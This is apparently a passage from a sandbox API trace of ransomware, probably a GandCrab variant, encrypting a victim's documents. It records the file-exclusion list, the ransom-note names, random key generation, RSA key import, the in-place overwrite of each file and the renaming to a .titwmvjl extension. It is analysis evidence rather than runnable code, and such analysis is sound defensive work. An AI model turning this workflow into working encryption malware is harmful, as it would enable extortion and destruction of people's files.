lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e4dc*=0x3e57, lpOverlapped=0x0) returned 1 [0090.434] WriteFile (in: hFile=0x248, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e4dc*=0x21c, lpOverlapped=0x0) returned 1 [0090.436] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.439] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.440] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.440] CloseHandle (hObject=0x248) returned 1 [0090.441] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\VOUJwwsAq6X.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\voujwwsaq6x.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\VOUJwwsAq6X.docx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\voujwwsaq6x.docx.titwmvjl"), dwFlags=0x1) returned 1 [0090.442] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.442] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0090.442] lstrcmpW (lpString1="xsjJQe16kOCXU29WGcCJ.ppt", lpString2=".") returned 1 [0090.442] lstrcmpW (lpString1="xsjJQe16kOCXU29WGcCJ.ppt", lpString2="..") returned 1 [0090.442] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\", lpString2="xsjJQe16kOCXU29WGcCJ.ppt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xsjJQe16kOCXU29WGcCJ.ppt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xsjJQe16kOCXU29WGcCJ.ppt" [0090.442] lstrlenW (lpString=".titwmvjl") returned 9 [0090.442] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xsjJQe16kOCXU29WGcCJ.ppt") returned 133 [0090.442] VirtualAlloc (lpAddress=0x0, dwSize=0x14a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.442] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xsjJQe16kOCXU29WGcCJ.ppt.titwmvjl") returned 142 [0090.442] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xsjJQe16kOCXU29WGcCJ.ppt") returned 133 [0090.442] lstrlenW (lpString=".ppt") returned 4 [0090.442] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.442] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ppt ") returned 5 [0090.443] lstrcmpiW (lpString1=".ppt", lpString2=".titwmvjl") returned -1 [0090.443] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.443] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xsjJQe16kOCXU29WGcCJ.ppt") returned 133 [0090.443] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xsjJQe16kOCXU29WGcCJ.ppt") returned 133 [0090.443] lstrcmpiW (lpString1="xsjJQe16kOCXU29WGcCJ.ppt", lpString2="desktop.ini") returned 1 [0090.443] lstrcmpiW (lpString1="xsjJQe16kOCXU29WGcCJ.ppt", lpString2="autorun.inf") returned 1 [0090.443] lstrcmpiW (lpString1="xsjJQe16kOCXU29WGcCJ.ppt", lpString2="ntuser.dat") returned 1 [0090.443] lstrcmpiW (lpString1="xsjJQe16kOCXU29WGcCJ.ppt", lpString2="iconcache.db") returned 1 [0090.443] lstrcmpiW (lpString1="xsjJQe16kOCXU29WGcCJ.ppt", lpString2="bootsect.bak") returned 1 [0090.443] lstrcmpiW (lpString1="xsjJQe16kOCXU29WGcCJ.ppt", lpString2="boot.ini") returned 1 [0090.443] lstrcmpiW (lpString1="xsjJQe16kOCXU29WGcCJ.ppt", lpString2="ntuser.dat.log") returned 1 [0090.443] lstrcmpiW (lpString1="xsjJQe16kOCXU29WGcCJ.ppt", lpString2="thumbs.db") returned 1 [0090.443] lstrcmpiW (lpString1="xsjJQe16kOCXU29WGcCJ.ppt", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0090.443] lstrcmpiW (lpString1="xsjJQe16kOCXU29WGcCJ.ppt", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0090.443] lstrcmpiW (lpString1="xsjJQe16kOCXU29WGcCJ.ppt", lpString2="KRAB-DECRYPT.html") returned 1 [0090.443] lstrcmpiW (lpString1="xsjJQe16kOCXU29WGcCJ.ppt", lpString2="CRAB-DECRYPT.html") returned 1 [0090.443] lstrcmpiW (lpString1="xsjJQe16kOCXU29WGcCJ.ppt", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.443] lstrcmpiW (lpString1="xsjJQe16kOCXU29WGcCJ.ppt", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.443] lstrcmpiW (lpString1="xsjJQe16kOCXU29WGcCJ.ppt", lpString2="ntldr") returned 1 [0090.443] lstrcmpiW (lpString1="xsjJQe16kOCXU29WGcCJ.ppt", lpString2="NTDETECT.COM") returned 1 [0090.443] lstrcmpiW (lpString1="xsjJQe16kOCXU29WGcCJ.ppt", lpString2="Bootfont.bin") returned 1 [0090.443] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xsjJQe16kOCXU29WGcCJ.ppt") returned 133 [0090.443] lstrlenW (lpString=".ppt") returned 4 [0090.443] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.443] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".ppt ") returned 5 [0090.443] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.444] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.444] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xsjJQe16kOCXU29WGcCJ.ppt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\xsjjqe16kocxu29wgccj.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x248 [0090.444] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.444] ReadFile (in: hFile=0x248, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e4f8*=0x21c, lpOverlapped=0x0) returned 1 [0090.445] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.445] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.445] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0090.446] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.446] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.447] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.447] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e4b4 | out: pbBuffer=0x259e4b4) returned 1 [0090.447] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.447] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.447] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.447] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.447] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0090.448] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.448] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.448] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.448] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e4d4 | out: pbBuffer=0x259e4d4) returned 1 [0090.449] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.449] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.449] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.449] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.449] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0090.450] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.450] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503778) returned 1 [0090.451] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.451] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0090.451] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.451] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e44c*=0x100) returned 1 [0090.451] GetLastError () returned 0x0 [0090.451] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.451] CryptDestroyKey (hKey=0x503778) returned 1 [0090.451] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.451] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.451] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.452] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0090.453] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.453] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503478) returned 1 [0090.453] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.453] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0090.453] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.453] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e44c*=0x100) returned 1 [0090.453] GetLastError () returned 0x0 [0090.453] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.454] CryptDestroyKey (hKey=0x503478) returned 1 [0090.454] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.454] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.454] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.454] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.454] ReadFile (in: hFile=0x248, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e4f8*=0x14589, lpOverlapped=0x0) returned 1 [0090.461] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xfffeba77, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.461] WriteFile (in: hFile=0x248, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x14589, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e4dc*=0x14589, lpOverlapped=0x0) returned 1 [0090.463] WriteFile (in: hFile=0x248, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e4dc*=0x21c, lpOverlapped=0x0) returned 1 [0090.464] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.468] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.468] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.468] CloseHandle (hObject=0x248) returned 1 [0090.469] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xsjJQe16kOCXU29WGcCJ.ppt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\xsjjqe16kocxu29wgccj.ppt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xsjJQe16kOCXU29WGcCJ.ppt.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\xsjjqe16kocxu29wgccj.ppt.titwmvjl"), dwFlags=0x1) returned 1 [0090.470] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.470] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0090.470] lstrcmpW (lpString1="xZw b4g_JOTbFhsht.csv", lpString2=".") returned 1 [0090.470] lstrcmpW (lpString1="xZw b4g_JOTbFhsht.csv", lpString2="..") returned 1 [0090.470] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\", lpString2="xZw b4g_JOTbFhsht.csv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xZw b4g_JOTbFhsht.csv") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xZw b4g_JOTbFhsht.csv" [0090.470] lstrlenW (lpString=".titwmvjl") returned 9 [0090.470] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xZw b4g_JOTbFhsht.csv") returned 130 [0090.470] VirtualAlloc (lpAddress=0x0, dwSize=0x144, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.470] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xZw b4g_JOTbFhsht.csv.titwmvjl") returned 139 [0090.470] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xZw b4g_JOTbFhsht.csv") returned 130 [0090.470] lstrlenW (lpString=".csv") returned 4 [0090.470] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.470] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".csv ") returned 5 [0090.470] lstrcmpiW (lpString1=".csv", lpString2=".titwmvjl") returned -1 [0090.471] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.471] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xZw b4g_JOTbFhsht.csv") returned 130 [0090.471] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xZw b4g_JOTbFhsht.csv") returned 130 [0090.471] lstrcmpiW (lpString1="xZw b4g_JOTbFhsht.csv", lpString2="desktop.ini") returned 1 [0090.471] lstrcmpiW (lpString1="xZw b4g_JOTbFhsht.csv", lpString2="autorun.inf") returned 1 [0090.471] lstrcmpiW (lpString1="xZw b4g_JOTbFhsht.csv", lpString2="ntuser.dat") returned 1 [0090.471] lstrcmpiW (lpString1="xZw b4g_JOTbFhsht.csv", lpString2="iconcache.db") returned 1 [0090.471] lstrcmpiW (lpString1="xZw b4g_JOTbFhsht.csv", lpString2="bootsect.bak") returned 1 [0090.471] lstrcmpiW (lpString1="xZw b4g_JOTbFhsht.csv", lpString2="boot.ini") returned 1 [0090.471] lstrcmpiW (lpString1="xZw b4g_JOTbFhsht.csv", lpString2="ntuser.dat.log") returned 1 [0090.471] lstrcmpiW (lpString1="xZw b4g_JOTbFhsht.csv", lpString2="thumbs.db") returned 1 [0090.471] lstrcmpiW (lpString1="xZw b4g_JOTbFhsht.csv", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0090.471] lstrcmpiW (lpString1="xZw b4g_JOTbFhsht.csv", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0090.471] lstrcmpiW (lpString1="xZw b4g_JOTbFhsht.csv", lpString2="KRAB-DECRYPT.html") returned 1 [0090.471] lstrcmpiW (lpString1="xZw b4g_JOTbFhsht.csv", lpString2="CRAB-DECRYPT.html") returned 1 [0090.471] lstrcmpiW (lpString1="xZw b4g_JOTbFhsht.csv", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.471] lstrcmpiW (lpString1="xZw b4g_JOTbFhsht.csv", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.471] lstrcmpiW (lpString1="xZw b4g_JOTbFhsht.csv", lpString2="ntldr") returned 1 [0090.471] lstrcmpiW (lpString1="xZw b4g_JOTbFhsht.csv", lpString2="NTDETECT.COM") returned 1 [0090.471] lstrcmpiW (lpString1="xZw b4g_JOTbFhsht.csv", lpString2="Bootfont.bin") returned 1 [0090.471] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xZw b4g_JOTbFhsht.csv") returned 130 [0090.471] lstrlenW (lpString=".csv") returned 4 [0090.471] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.471] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".csv ") returned 5 [0090.471] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.471] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.472] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\fV1MCunDF-l\\xZw b4g_JOTbFhsht.csv" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\fv1mcundf-l\\xzw b4g_jotbfhsht.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x248 [0090.472] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.472] ReadFile (in: hFile=0x248, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e4f8*=0x21c, lpOverlapped=0x0) returned 1 [0090.473] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.473] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.473] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0090.474] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.474] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.474] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.474] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e4b4 | out: pbBuffer=0x259e4b4) returned 1 [0090.475] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.475] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.475] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.475] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.475] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0090.476] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.476] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.477] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.477] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e4d4 | out: pbBuffer=0x259e4d4) returned 1 [0090.477] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.477] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.477] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.477] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.477] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0090.478] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.478] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x5037f8) returned 1 [0090.478] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.478] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0090.478] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.479] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e44c*=0x100) returned 1 [0090.479] GetLastError () returned 0x0 [0090.479] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.479] CryptDestroyKey (hKey=0x5037f8) returned 1 [0090.479] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.479] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.479] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.479] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0090.481] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.481] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503238) returned 1 [0090.481] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.481] CryptGetKeyParam (in: hKey=0x503238, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, 